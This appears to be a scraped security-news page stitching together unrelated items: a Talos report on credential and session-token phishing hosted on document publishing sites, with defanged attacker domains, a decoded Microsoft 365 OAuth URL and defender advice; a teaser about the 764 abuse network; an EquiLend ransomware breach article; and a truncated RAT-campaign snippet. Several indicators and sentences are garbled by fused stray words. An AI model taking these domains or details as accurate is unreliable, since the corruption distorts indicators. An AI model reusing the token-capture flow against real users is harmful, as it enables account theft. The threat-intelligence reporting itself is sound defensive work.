The link included in the body of the email led to a Publuu flipbook, with a URL like https://publuu[.]com/flip-book/[6_digit_identifier]/[6_digit_identifier]. The phishing document was a generic, widely used file observed in similar attacks on other DDP sites. However, while the phishing document was reused, the adversary had modified the Publuu page with the sender organization’s name to lend authenticity to the document.

Clicking the “VIEW ONLINE PDF” link directed the user to a Cloudflare CAPTCHA, a technique described in the publications by Cofense and Netskope linked above. Use of the CAPTCHA likely has a dual purpose, as it both protects the credential harvesting page from automated access while giving the impression of a legitimate site to users who fall victim to the phishing link.

After completing the CAPTCHA, the victim is directed to a convincing replica of a Microsoft 365 authentication page. The URL for the page contains a lengthy alphanumeric string, which may act as an identifier for the visitor. The adversary-controlled domain associated with the authentication page was atlas-aerspace[.]onlineextracted. The customization of the original Publuu page to the target organization in contrast to this unrelated spoofed domain suggests this incident may have been part of a cascading BEC attack.  

Talos IR later identified an attack chain hosted on the Issuu DDP site with similar indicators. The phishing document was nearly identical, though, unlike the Publuu link, this link URL leveraged the Google AMP to Cloudflare CAPTCHA flow described in the Cofense blog. The credential harvest page was ultimately located at the domain aerospace-atlas[.]online and included the same identifier-style URL string as the one observed with the atlas-aerspace[.]online90 days domain.

In aggregate, the following similar domains – all hosted by Cloudflare – were registered within 90 days. The first two domains were found to be associated with phishing lures hosted on DDP sites, suggesting an effort to target users of the legitimate atlas-aerospace[.]com domain.

*   aerospace-atlas[.]online (registered Jan. 24, 2024)
*   atlas-aerspace[.]online (registered Dec. 19, 2023)
*   atlas-aerspace[.]com (registered Oct. 25, 2023)

Talos provided notification through established channels so affected organizations could review and address this activity.

**Marq**

Talos IR also responded to an incident involving the Marq DDP site. The Marq page hosting the phishing document had already been deactivated, but Talos IR used other forensic data to determine the URL of the associated credential harvesting page. The first part of that URL was https[:]//mvnwsenterprise[.]top:443/aadcdn.msauth.net/.

While the Marq page could not be accessed, Talos IR identified similar pages through open- and closed-source intelligence. These pages were customized to show the sender organization in the HTML Title tag (displayed in the browser tab) but otherwise used an identical “Microsoft365 Online Fax” lure. Unlike some activity clusters on other DDP sites, each page was configured with a unique URL using the .top top-level domain, such as onedrivesmncs[.]top, onedrivemwsamc[.]top, and 347nsm239mws934[.]top. Another common characteristic was the presence of the URL query string tkmilric in all URLs embedded in the phishing document. 

Once clicked, the link passed the user to the spoofed Microsoft authentication page, which resided at the redirect.cgi path of the unique \`.top\` domain. The URL query string for this page included a “ref” parameter, which contained a Base64 and URL encoded value. An example of the decoded value is:

https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https://outlook.office.com/owa/&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code id_token&scope=openid&msafed=1&msaredir=1&client-request-id=**[REDACTED]**&protectedtoken=true&claims={"id_token":{"xms_cc":{"values":["CP1"]}}}&nonce=**[REDACTED]**&state=**[REDACTED]**

The value 00000002-0000-0ff1-ce00-000000000000 found in the client_id and resource parameters is the Microsoft Application ID for Office 365 Exchange Online. The claims string {"id_token":{"xms_cc":{"values":["CP1"]}}} is a required component for a client application to communicate its capabilities to Microsoft Entra ID in an OAuth 2.0 authorization flow. These characteristics likely indicate a campaign to capture session tokens for Microsoft 365 components using the same lure and customized or DGA-generated domains.

**Other DDP Sites**

Following these investigations, Talos IR identified similar activity on other DDP sites. The following examples are provided to demonstrate similarities across DDP sites and are not related to any ongoing or prior Talos IR investigations.

**Flipsnack**

Talos IR identified at least two lure formats used recently on FlipSnack – one eFax PDF-themed lure, and one SharePoint PDF-themed lure. Both landing pages had been removed by the adversary at the time of Talos IR’s review, but the URL for the adversary-controlled page associated with the SharePoint lure (afurrytailwedding[.]com/cure/MSthOffice/index.phpexcept) could indicate a potential Microsoft 365 credential harvesting effort. Neither lure had been customized to target a specific victim. 

**Issuu**

Malicious documents found on Issuu were very similar to those observed on Publuu, except for minor details like a “Reference” number and the link URL. Of the two links tested by Talos IR, one was redirected through an intermediary site before reaching the landing page. The other leveraged the Google AMP and Cloudflare CAPTCHA flow reported by Cofense. Again, the landing pages for both examples had been removed by the adversary at the time of Talos IR’s review.

**RelayTo**

Talos IR located at least two different phishing lures that had been deployed to the RelayTo site in early September 2023. One of these lures was published repeatedly from multiple RelayTo accounts with modifications to only the name of the associated organization. The link in each lure – https[:]//secure-docsx[.]com/efgh5678 – was the same. The secure-docsx[.]combefore the domain had been registered a week this activity began and was followed by the creation of the secure-docu[.]com domain, with which it shared registrant details.

**SimpleBooklet**

Talos IR could not locate a malicious page on the SimpleBooklet site that had not already been deactivated. However, a review of related URLs in VirusTotal suggests that an adversary made prolific use of this site for phishing and possible credential theft from October 2020 through January 2021.

**Defender actions**

Defenders should consider the following actions to help defend against phishing attacks that leverage DDP sites.

*   Block common DDP sites via border security devices, endpoint detection and response (EDR) like Cisco Secure Endpoint, web content filtering, and/or DNS security controls if access to these sites is not required for normal business operations. If blocking these sites will disrupt normal operations, develop a procedure to ensure malicious domains identified in DDP-hosted phishing lures can be quickly blocked.
*   Configure email security controls to detect and alert on links in emails containing common DDP site URLs.
*   Leverage threat intelligence to quickly identify newly created sites related to known threats – in this case, new DDP sites that may be leveraged by threat actors.
*   Monitor for behavioral trends within the organization’s internal environment that could indicate coordinated malicious activity, including activity to blocked sites.
*   Update user security awareness training to include information about DDP sites and other cloud-hosted phishing attack methods. Reinforce a “see something, say something” mentality when users are uncertain about a site’s legitimacy.

End users can also support defenders by remaining vigilant for documents shared over unusual or uncommon sites, even if those sites are legitimate and have a favorable reputation, and by following their organization’s guidelines for reporting suspicious emails.

Threat actors leverage document publishing sites for ongoing credential and session token theft

A global network of violent predators is hiding in plain sight, targeting children on major platforms, grooming them, and extorting them to commit horrific acts of abuse.

There Are Dark Corners of the Internet. Then There's 764

By Waqas
Some reports suggest that LockBit ransomware gang is behing the EquiLend data breach.
This is a post from HackRead.com Read the original post: EquiLend Employee Data Breached After January Ransomware Attack

EquiLend, a financial technology firm, experienced a data breach following a January ransomware attack – EquiLend is offering credit monitoring and identity theft protection to affected individuals.

Financial technology firm EquiLend recently disclosed a data breach reportedly originating from a January ransomware attack. The attack, which according to Bloomberg’s report, is attributed to the LockBit ransomware group, compromised the personal information of EquiLend employees.

The claim that LockBit ransomware is involved in the incident is concerning for businesses, as the group, despite its shutdown, has not only resurfaced but is already targeting new victims.

****Breach Details Emerge****

EquiLend initially reported a “technical issue” on January 24th, leading to service disruptions. The company later confirmed a ransomware attack but provided limited details. Recent notifications to affected individuals and authorities reveal the extent of the data breach.

****Employee Information Exposed****

According to the notification sent by the company to impacted customers, the attack compromised sensitive employee data, including names, dates of birth, Social Security numbers, and internal payroll information. EquiLend assures it has no evidence of this information being misused but is offering two years of complimentary credit monitoring and identity theft protection services to affected individuals.

****Ransomware Attack Scope Unclear****

While client-facing services were restored by February 5th, the full impact of the attack remains unclear. Speculation suggests EquiLend may have negotiated with the attackers, but the company has not confirmed any ransom payment.

It’s worth noting that at the time of writing, LockBit’s dark web leak site showed no mention of EquiLend. This could indicate that negotiations have occurred, or the group has yet to list EquiLend on their website.

****EquiLend Responds****

EquiLend is working with cybersecurity experts to investigate the incident and prevent future occurrences. The company emphasizes its commitment to data security and is urging affected individuals to remain vigilant and monitor their financial statements for suspicious activity.

****Experts Weigh In****

For insights, we reached out to Tamara Kirchleitner, Senior Intelligence Operations Analyst at Centripetal. “In the wake of this cyberattack, it’s a stark reminder of the relentless threat fintech firms face. Offering affected employees free identity theft protection is commendable, yet many companies remain reactive,” Tamara said.

“This incident underscores the need for proactive cybersecurity measures. Implementing robust protocols is imperative in today’s digital landscape. Businesses must embrace advanced technologies to safeguard their systems and customer data. It’s time for a paradigm shift towards anticipatory cybersecurity,” she warned.

****Importance of Cybersecurity****

This incident highlights the growing threat of ransomware attacks and the importance of strong cybersecurity measures. Financial institutions like EquiLend handle sensitive data, making them prime targets for cybercriminals.

EquiLend’s data breach should be a wakeup for organizations to prioritize data security investments and implement strong safeguards against cyberattacks.

1.  **FIN8 Resurfaces with New Sardonic Backdoor**
2.  **Hive Ransomware Resurfaces as Hunters International**
3.  **FBI Disrupts Chinese State-Backed Volt Typhoon’s KV Botnet**
4.  **Mirai botnet resurfaces with MooBot variant to target D-Link devices**
5.  **Nasty Mamba ransomware that encrypts entire hard drive resurfaces**

EquiLend Employee Data Breached After January Ransomware Attack

A new phishing campaign has been observed delivering remote access trojans (RAT) such as VCURMS and STRRAT by means of a malicious Java-based downloader.
“The attackers stored malware on public services like Amazon Web Services (AWS) and GitHub, employing a commercial protector to avoid detection of the malware,” Fortinet FortiGuard Labs researcher Yurren Wan said.
An unusual aspect of the

Tag

#git